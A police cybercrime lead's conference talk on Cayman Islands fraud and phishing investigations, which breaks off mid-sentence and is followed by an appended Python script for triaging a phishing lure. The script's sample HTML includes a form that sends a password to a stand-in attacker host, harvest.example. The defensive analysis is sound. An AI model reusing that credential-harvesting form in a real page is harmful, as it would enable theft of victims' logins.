
Everybody, welcome to my talk. I'm the thing standing between you and lunch, so you're either going to have an early lunch or a late one depending on how many questions you ask at the end. We detectives call that a hint as to how many questions you should actually be asking at the end, eating into your own time. As the introduction said, I've moved from a round building in Cheltenham, where there are five thousand people working on a daily basis, with a team of about 70, to a very small team, some of whom are sat in the front row today; they were the ones whooping and hollering. Thank you for the applause; you might not want to applaud at the end of this.

So I lead a small team. We mostly do digital forensics, but we also investigate cybercrime as it's committed across the island. For those of you who are in companies, you'll probably recognise that the weakest link in any cyber security measure is the individual, so I thought I'd show you a representation of what it's like when you're trying to tell somebody to not click the link. I know it's easy for your mind to wander; it often feels like that's what we do when we try to tell somebody not to click the link: their attention just goes, monkey plays cymbals in their head, and even the monkey eventually says listen to what you're being told.

So our day job is the extraction and analysis of electronic devices, assisting the investigation of cyber-enabled crime (those are crimes that can be committed on the street, not necessarily just with a computer, so frauds, that type of thing; we assist the cyber investigators with it), and we investigate cyber-dependent crimes, those are crimes that can only be committed by the use of a computer, so that'd be hacking, etc. This is a marvellous machine we use for all our investigations. This was purpose built, designed by ourselves, a very high-spec system; it's a glorified gaming machine, if you like, because of the data processing we have to do it has to be high-quality stuff. We get our exhibits come in through a chain of custody; we have to ensure that the chain of custody is correct. And these are, just very quickly for those who weren't at the workshop yesterday, some of the software we use to extract data. This one's from phones. We use Tableau devices, which are read-only, because we need to ensure the quality and the integrity of the evidence.

So, to go through investigations we've actually done. These were actual investigations; hopefully, with somebody from data protection in the audience, I've redacted all the details that are personalised. This came in from our colleagues in the Cayman Islands Bureau of Financial Investigation. This particular victim thought he was on a trading platform, ffxtrader.com. He was told his account would reflect the investments he had made; screenshots were provided, which I'll show you. The website was in fact controlled by a fraudster, and figures shown within user accounts corresponded to real-world investments, so there was a lot of money going through this web page. My colleagues from the Cayman Islands Bureau of Financial Investigation specifically followed where the cryptocurrency was going, and I concentrated on the web page itself. This was the victim's screenshot showing the amount of money he'd invested in this company. That's a lot of money; it's certainly a lot of money to me. And this is one of the things he got sent from them, showing the profit he had made that day, which of course wasn't profit.

So what we do with that is we take the information that's given on there and investigate to see if we can find out who's responsible for this particular website. Alex Larson PhD: well, that's pretty impressive, isn't it? He must be a good guy, he's got a PhD, although most people with a PhD call themselves Dr Alex Larson rather than PhD. So we looked to see if we could find anybody who is Alex Larson; an online search is just not going to achieve a great deal. If you're putting in Dr Alex Larson you get a lot of doctors all over the world, so I didn't go on to use some of the tools that Lamb was talking about yesterday, simply because I have no idea who this person is and it would be really difficult to trace after them and follow through. 7 Newgate Street, however, we did check up on; it's a premises where you can register your company at, and that's it. The telephone number itself we looked into, and everybody has this telephone number; it's used in various different frauds. I think it was an O2 number, it was a mobile number. This company, FXX Trading, which is dealing in hundreds of thousands if not millions of stolen funds daily, using a mobile phone? Highly unlikely. And when I looked at the page itself, the web page, sorry, the page is pulling down stuff from tradingview.com; basically that was live market feeds that the company were pretending were theirs. In fact they were just bringing it down from another company, another legitimate company. These were the terms and conditions: the company is registered in the Marshall Islands, which is another offshore financial operation, operated by Bond Local Consulting from Bulgaria. Neither of these places is law-enforcement friendly, so there was little point going after them. I did a check at Companies House with the company and found this particular company; as you can see it's been dissolved. The gentleman who was the director was Bulgarian, he was born in 1958, and that was the only data I could get. And that was the final notice for the company. It's quite common: fraudsters register a company, and after the first year, when they don't file reports, Companies House strikes them off. But the Financial Conduct Authority in London had already put out warnings about them, so they were on the radar in the UK, but they weren't here.

Oh, so I've got to go back one. The basics of this was we didn't get very far in finding out who the cyber criminals behind it were. So the alternative, and what we do a lot of, is disruption: I had the web page taken offline so nobody else could fall victim to this particular fraud. I think the financial bureau managed to get quite a lot of the funds held, and I think it's still going through the process of the victim getting that back, but it's a long, complex process because of where they were held.

So the next one. This was an email sent to government employees; yes, unfortunately even government employees click the link, that's why I showed the Homer thing to begin with. So info fax at gov.ky, purporting to come from an internal address; in fact, as you can see, it's SSD multi-state. audio0485, which is what the person was asked to play, was in fact an HTML link; it wasn't an MP3. So I looked at the HTML document. Ignore the bit in blue, that was highlighted in error; the bit I want you to look at is the bit with the yellow box around it, which is the web page the link was going to go to. Generally speaking with this, what I do is I copy and paste the URL, put it into a browser and see what it actually is. So I did that and got this, which was just weird: this is a legitimate Microsoft site, this is a legitimate Microsoft login. So I had no choice but to click on the link itself to see what it was actually going to do. It wasn't on the government system, before anybody starts to think it was; it was on Kali, I think I used. But what I did when I was doing the password is I did a network capture at the same time, so I captured the network traffic from the web page as I was putting the password in, and this is where it turned up. So the reason it was sending me to the Microsoft login page is it had already got the data itself and had immediately sent it out. If you see the top line, which one's a pointer, so this, oh sorry, this top line here is where it posted my password, but then immediately brought up the Microsoft page. And I hope you liked the password I used; I'm not sure if the actors liked it too much. Again, there was very little we could do with this. It was another, and if you've been involved in any of these types of investigation, I wish I had a pound, or a dollar, for every time this was a GoDaddy-registered, Namecheap-held web page; this one was as well. They are very law-enforcement unfriendly, so we can't send legal orders on them, but my experience tends to be that they're not that good.

So this one, this one really annoyed me; you'll find out why in a moment. This was a company who were claiming to assist people who'd been victims of a Ponzi scheme. These people had already lost money to a Ponzi scheme, I think this one was Dolphin Trust, which has been dealt with by the German authorities, so people had already lost tens of thousands of dollars in this, and this company is saying, oh, by the way, we can get you your money back and we won't charge you for it. Now, once you registered with them you got this second email, which was supposed to come from the Fraud Desk Investigation Department of the Royal Cayman Islands Police Force. We are not a police force, we are a police service. "Attached is a police order for refund", and this is what was attached: it uses our badge, signed by my Commissioner. I think that's not his signature, and it states that the money was being held in an account in the Cayman National Bank; obviously it's not an actual account. When I spoke to the people involved, about the victims who'd gone a little bit further with them, the company says, okay, so we're going to charge you about ten thousand for us to access these Cayman National Bank funds; once we've got the ten thousand we'll return it to you together with the money that you lost in the Dolphin... which one was this? There's two of them. Yes, sorry. And I knew we'd seen this one before, and there was another one. Now, this claimed to be for the ROFX scam; again, that was another Ponzi scheme where people had lost money. These criminals are targeting people who've already lost money, and they were making quite a lot of money from it, so again we disrupted them and took the web page offline so there was nobody going to fall victim to this. [inaudible] signature, but I've seen it often enough to know it wasn't. The people involved in this, we got all the names, they've got all the details, just no trace whatsoever; the company wasn't registered anywhere, despite the fact it says that it is. It also actually had a YouTube page where there were all these nice souls on there saying, oh, this is a great company, except none of them actually mentioned them by name. There were people who worked for them saying, oh, we're really good, we're really brilliant at what we do, and then there were people who said, oh, I've used this company (they were all Australian for some reason), I used this company and I got all this money back and they were really great, but they never actually mentioned this company by name. So they were fraudulently put-in reviews on YouTube for people to think, well, this is a legitimate company. That was also taken offline.

This is the one I've dealt with most recently. Sorry, go back to these. So this was related to that, FFF Global, and again they used a mobile phone as their contact details. I do phone these numbers up, and nobody ever answers. Mitre Passage, North Greenwich, is actually a really poor premises, and I got in contact with them, but they didn't have a company registered at their address; I was really shocked and surprised. So this one is a little bit one of the more technical ones we did. Again it was a phishing email that came into government addresses, studio…com. The good news was, if you understand what this terminology means, 302 means that it didn't get there, so I was quite relaxed already, because the web page didn't open; in fact, when you go on to it, it says straight away that it was closed. This is a screenshot of the investigation we did, where we took the host of one of the people who'd opened the email, put it onto a forensic system and downloaded it so I could find the actual email that was sent to the person, and from the email I can find the malicious link or the malicious file. The reason we do that is to see what it does. So I initially, in Linux, just cat'ed it to see what it was. It's JavaScript; another knock-knock joke about JavaScript, but we'll probably leave the jokes for another time. Not the easiest thing to reverse engineer; I didn't bother a great deal. The interesting thing for me was this part here: the first thing it was bringing down was a version of jQuery, 1.9.1. I think jQuery is about 3.8.7 now, so the actors were using such old script that they had to pull down an older version of jQuery to make the damn thing work, and in fact it didn't work anyway. The reason it didn't work is the JavaScript was not enabled properly; the error code relates to VBScript, and I think it was 2019 Microsoft banned VBScript from its systems, so it was never going to work. It was a close escape, but it shows you the perils of being involved in these types of things. I'm just going to catch up with my notes.

Oh, so that's the types of investigations we do, because that's the type of crime we pick up on, that's the type of crime that's reported to us. I'm going to talk more about that in a moment. Somebody asked Laura earlier about how many data breaches have been reported to the Ombudsman; I can tell you how many have been reported to us, and that's zero. I know some have happened because I've read about them in the Ombudsman's report, but nobody ever reports them to us. I don't know why.

So the World Economic Forum has recently published its 2023 risks: at number eight in the next two years, and in the next ten years, widespread cybercrime and cyber insecurity. These are known risks, they're anticipated risks. This is not some group who have got no idea what they're talking about; this is the World Economic Forum, some of the most senior people in the world determining what risks there are. Unsurprisingly, in ten years most of the bigger risks relate to climate change. What they said about cybercrime was: on the horizon, cybercrime, so it's going to happen; attempts to disrupt critical technology-enabled resources and services will become more common. Quite a few risk and threat companies are saying for this year and probably next year we're going to see a decrease in ransomware attacks, but an increase in really serious attacks designed to take down your infrastructure completely. Technology risks are not solely limited to rogue actors: sophisticated analysis of larger data sets will enable the misuse of personal information. So they're talking about the threat from criminals; they're also talking about insider threats. That's the thing that's going to be a threat in two years and in ten years.

We are almost at war with cyber criminals, and if anybody's ever had any military training you'll probably recognise the centre of gravity. It's been around since the 18th century; one of the best and most influential generals of all time said it's "the hub of all power and movement on which everything depends". So this talk is about looking at how the cyber security community of Cayman can work with law enforcement. It refers to those sources of strength and balance; it is that characteristic, capability or locality from which a force derives its freedom of action, physical strength or will to fight. It's common practice in the military to say that the easiest way to take down an enemy is to take down their centre of gravity, and so the military try to do that, but they also try to protect their own centre of gravity.

So if we look at this in relation to cyber criminals, what characteristics do they have? Well, they're very money-orientated, and they really don't give a damn about who the target is or what for. If you think of some of the jobs I dealt with or investigated: when Hackney Council were ransomwared, they were taken completely offline in the middle of the pandemic. The effect on them and the community was huge; the cyber criminals didn't give a damn about that, all they wanted was the money. That's what characterises them, that's what they do. Capability? Well, that's huge; they can get into most, if not any, infrastructure if they're determined to do so. Locality: they're worldwide, which for law enforcement makes it really difficult, because it's quite difficult for us to track them down if they're in law-enforcement-unfriendly countries. Will to fight: they've absolutely got the will to fight, and the reason for that is they're making a lot of money and they'll continue to make a lot of money.

So the process starts with the idea of attacking the enemy's centre of gravity while protecting your own. There are three phases to it. Critical capabilities: what are cyber criminals' capabilities? We just discussed that. Critical requirements: what resources do they need? But they've almost got unlimited resources now, and the reason for that is the amount of money they can get, the amount of money they can pay to people and the amount of infrastructure they can get. So the FBI run a thing called IC3, which is the Internet Center for Cyber Crime, I think, but they report figures. This is for the last five years, with obviously 2022 being the last one. This is the losses that have been reported to IC3, and as I talked about earlier, we all know there's a huge amount of under-reporting, so I think this figure is nowhere near what the actual figure is, not even close. The interesting thing for me was that the number of complaints has actually dropped, but the volumes have increased significantly. The most costly one, you'd be unsurprised to hear, was BEC, business email compromise; that was 2.7 billion in 2022. Critical vulnerabilities: what are cyber criminals' vulnerabilities? Those aspects or components of critical requirements that are deficient or vulnerable to attack, direct or indirect. I'm not sure they've got that many, to be honest with you. When I worked for the NCSC we did take down a lot of infrastructure; we took down TrickBot twice, I think, and it still came back, because they're not that vulnerable, and we are not allowed to attack them, technically.

So what's my team's centre of gravity? We have the ability to disrupt to protect the community. I think most people in here are probably from companies that have really good cyber security; you've got really good infrastructure behind you and a lot of people. The people out there, the people who are losing money, don't, and it's my job to protect them as best we can. So we do disrupt where we find it; I think, from memory, we took down 25 fake wealth management websites last year, I think it was up at 25.

We have the resources and capacity to disrupt and, as I said, have done so quite successfully so far. Critical vulnerabilities: intelligence is our critical vulnerability. We don't know what's happening out there because no one tells us. No one says, by the way, John, we had this phishing attack, this is what we did about it. I don't know; is it reputational damage, or is there just no cybercrime happening on this island at all? I would like to think it's the second; I think it's more the first. As I've shown, we can take these websites down. In fact, if you've got enough money you can subscribe to a company called Netcraft and they'll do what I do for you, because it is time-consuming, it does take a while. What I can get done quite quickly now is, when we get some phishing links, I can normally get that page flagged as malicious quite quickly and then work to get it taken down a little bit later. So the visual representation of w
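Editor's added example. The voicemail-themed phishing email described earlier in the talk (the HTML "audio0485" attachment that posted the entered password to the attacker and then bounced the browser to the genuine Microsoft login) is the kind of lure that can be triaged with a small script: pull the URLs out of the attachment, then look at the captured requests from entering a throwaway password and flag the POST that ships a password field off-domain and is answered with a redirect to a real login page. The Python below is written for this page; it is not code from the speaker or his team. The lure HTML, the capture records and the host name harvest.example are constructed stand-ins, not the real artefacts from the case.

```python
"""
Added example (not from the talk): triage a phishing HTML lure the way the
speaker describes. Step 1 extracts the URLs the attachment reaches out to;
step 2 scans a capture of the requests made while typing a throwaway
password and reports the credential exfiltration.  Everything below is a
constructed sample; 'harvest.example' is an assumed attacker host.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# Constructed stand-in for the 'audio0485' attachment: looks like a
# voicemail player, but the form posts to the attacker, not to Microsoft.
SAMPLE_LURE = """
<html><body>
<p>Play voicemail <a href="https://harvest.example/play?id=0485">audio0485</a></p>
<form method="post" action="https://harvest.example/login.php">
  <input name="email"><input type="password" name="passwd">
</form>
<script src="https://code.jquery.com/jquery-1.9.1.min.js"></script>
</body></html>
"""

# Constructed stand-in for the network capture: one record per HTTP request,
# with the response status and Location header (None when absent).
SAMPLE_CAPTURE = [
    {"method": "GET",  "url": "https://harvest.example/play?id=0485",
     "body": "", "status": 200, "location": None},
    {"method": "POST", "url": "https://harvest.example/login.php",
     "body": "email=victim%40gov.ky&passwd=Try-Me-123", "status": 302,
     "location": "https://login.microsoftonline.com/"},
    {"method": "GET",  "url": "https://login.microsoftonline.com/",
     "body": "", "status": 200, "location": None},
]

# Hosts where a Microsoft credential POST would legitimately go (assumed list).
LEGIT_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com"}
# Form field names that usually carry a password.
PASSWORD_FIELDS = {"password", "passwd", "pass", "pwd"}


class LureParser(HTMLParser):
    """Collect every URL the lure would contact, tagged by tag/attribute."""

    def __init__(self):
        super().__init__()
        self.urls = []  # list of (tag, attribute, url)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if (tag, name) in {("a", "href"), ("form", "action"),
                               ("script", "src"), ("iframe", "src")} and value:
                self.urls.append((tag, name, value))


def extract_urls(html):
    """Step 1: the links, form targets and remote scripts in the attachment."""
    parser = LureParser()
    parser.feed(html)
    return parser.urls


def find_credential_exfil(capture):
    """Step 2: POSTs carrying a password field to a non-login host that are
    immediately answered with a redirect to a genuine login page."""
    hits = []
    for req in capture:
        if req["method"] != "POST":
            continue
        fields = set(parse_qs(req["body"]).keys())
        host = urlparse(req["url"]).hostname or ""
        redirect_host = urlparse(req["location"] or "").hostname or ""
        if (fields & PASSWORD_FIELDS and host not in LEGIT_LOGIN_HOSTS
                and 300 <= req["status"] < 400
                and redirect_host in LEGIT_LOGIN_HOSTS):
            hits.append({"exfil_host": host, "fields": sorted(fields),
                         "redirect_to": redirect_host})
    return hits


if __name__ == "__main__":
    for tag, attr, url in extract_urls(SAMPLE_LURE):
        print(f"{tag}[{attr}] -> {url}")
    for hit in find_credential_exfil(SAMPLE_CAPTURE):
        print("credential POST to", hit["exfil_host"],
              "with fields", hit["fields"], "then redirect to", hit["redirect_to"])
```

The capture records mimic what the speaker saw in his network capture: the POST to the harvesting host is answered with a 302 to login.microsoftonline.com, which is why pasting the URL straight into a browser showed only "a legitimate Microsoft login". In a real case the records would come from a PCAP or proxy log taken on an isolated analysis box (the talk used Kali), and the attachment from the forensic copy of the recipient's mailbox, as the speaker describes.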